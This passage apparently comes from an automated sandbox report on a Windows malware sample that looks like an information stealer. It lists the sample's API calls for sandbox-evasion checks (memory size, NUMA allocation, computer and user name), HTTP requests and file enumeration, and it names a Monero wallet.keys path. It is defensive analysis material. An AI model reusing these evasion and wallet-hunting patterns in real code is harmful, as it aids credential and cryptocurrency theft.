                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                              • Instruction ID: 56848e4a0d9a8341872a63fbb8e8a46d62d9e76056a42421ad43ddb698981f75
                              • Opcode Fuzzy Hash: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                              • Instruction Fuzzy Hash: C6312371940218ABDB04F7F0DC56FEE7778AF24301F90452AF502A22D2DF749905D7A6
                              Function 001D6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 1d6af3 1437 1d6b0a 1436->1437 1439 1d6b0c-1d6b22 call 1d6920 call 1d5b10 CloseHandle ExitProcess 1437->1439 1440 1d6aba-1d6ad7 call 1daad0 OpenEventA 1437->1440 1446 1d6ad9-1d6af1 call 1daad0 CreateEventA 1440->1446 1447 1d6af5-1d6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                              • Sleep.KERNEL32(00001770), ref: 001D6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                              • ExitProcess.KERNEL32 ref: 001D6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                              • Instruction ID: 7fb685d9ee84127ecffa19bf0666dec68f0f017d93d8810926bdf130a1a6a69e
                              • Opcode Fuzzy Hash: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                              • Instruction Fuzzy Hash: D6F05E30A40329AFEB00EBA0DD06BBD7B34EF14701F108927F502B22C1DBB05540D69A
                              Function 001C47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 3376183f9d1dd09f101d879d895ed270a9789af4c711f93860b24f92697fcb8b
                              • Instruction ID: 21aed0b43ba0af8563f80d11fbca552da24ffdf485c210565c0bc32d9e2778c2
                              • Opcode Fuzzy Hash: 3376183f9d1dd09f101d879d895ed270a9789af4c711f93860b24f92697fcb8b
                              • Instruction Fuzzy Hash: 79213BB1D00209ABDF14DFA4E845ADE7B74FF45320F108626F929A7281EB706A05CB92
                              Function 001D51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                                • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                                • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                                • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
                                • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                                • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                              • Instruction ID: 6b0851df024d570ee83375b9463608ad444015e55776f914caec84c7662da607
                              • Opcode Fuzzy Hash: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                              • Instruction Fuzzy Hash: FC110030910148ABCB14FF64DD52EED7339AF70300FC04159F81A5B692EF71AB09D695
                              Function 001C1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 1c1220-1c1247 call 1d89b0 GlobalMemoryStatusEx 1496 1c1249-1c1271 call 1dda00 * 2 1493->1496 1497 1c1273-1c127a 1493->1497 1499 1c1281-1c1285 1496->1499 1497->1499 1501 1c129a-1c129d 1499->1501 1502 1c1287 1499->1502 1504 1c1289-1c1290 1502->1504 1505 1c1292-1c1294 ExitProcess 1502->1505 1504->1501 1504->1505
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                              • ExitProcess.KERNEL32 ref: 001C1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                              • Instruction ID: 61040eea1f1da2640a96c8256310a6e24c66d23e82c411431326c6ee297c3a2b
                              • Opcode Fuzzy Hash: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                              • Instruction Fuzzy Hash: A5016DB0D80308BAEB10EBE0DC49FAEBB78AB25705F208059F705B72C1D77495418799
                              Function 001D78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                              • Instruction ID: 58cd965297c62804d37abc2e6c033d49b70b734a17c05f1dcf54022e3a9794b9
                              • Opcode Fuzzy Hash: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                              • Instruction Fuzzy Hash: 1D0162B2944308EBC704EF95DD45BAEBBB8F704B25F10422AE545A3380D3745904CBA1
                              Function 001C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                              • ExitProcess.KERNEL32 ref: 001C1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                              • Instruction ID: 3d2d2482cb582aabc201830e5967484baf845bebe06df485a3dcb9c86b473bd2
                              • Opcode Fuzzy Hash: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                              • Instruction Fuzzy Hash: 6AE0E671985308FBE7106BA09D0AF097678AB15B01F104154F709761D1D7B56650969D
                              Function 001C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001C10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001C10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                              • Instruction ID: 43bcbe6808e8632941de006a5b51afa8db644ba291e92c2da1c0baacd52e2f8c
                              • Opcode Fuzzy Hash: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                              • Instruction Fuzzy Hash: 42F0E271681308BBE714AAA4AC59FAEB7E8E705B15F305458F504E3280D6719E00CAA5
                              Function 001C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                                • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                                • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                                • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                                • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                                • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                              • ExitProcess.KERNEL32 ref: 001C11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                              • Instruction ID: a283d6094b48dbd68e8665895b993214926aafe130047504ce0a5bd0ed67cd1c
                              • Opcode Fuzzy Hash: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                              • Instruction Fuzzy Hash: C4E012B595430163CA0073F4AD0AF2A329C5B35349F08083AFA05E3343FB79F810956A

                              Non-executed Functions

                              Function 001D38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001D38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D38E3
                              • lstrcat.KERNEL32(?,?), ref: 001D3935
                              • StrCmpCA.SHLWAPI(?,001E0F70), ref: 001D3947
                              • StrCmpCA.SHLWAPI(?,001E0F74), ref: 001D395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D3C67
                              • FindClose.KERNEL32(000000FF), ref: 001D3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                              • Instruction ID: 4461e5c6d42108e221b41b9ba63afb6839398d2c24da5fb9e8171d68c0788b1a
                              • Opcode Fuzzy Hash: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                              • Instruction Fuzzy Hash: 77A161B2A00308ABDB24EFA4DD85FEE7378BF58300F044599E51DA6141EB759B94CF62
                              Function 001CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,001E0B32,001E0B2B,00000000,?,?,?,001E13F4,001E0B2A), ref: 001CBEF5
                              • StrCmpCA.SHLWAPI(?,001E13F8), ref: 001CBF4D
                              • StrCmpCA.SHLWAPI(?,001E13FC), ref: 001CBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CC7BF
                              • FindClose.KERNEL32(000000FF), ref: 001CC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
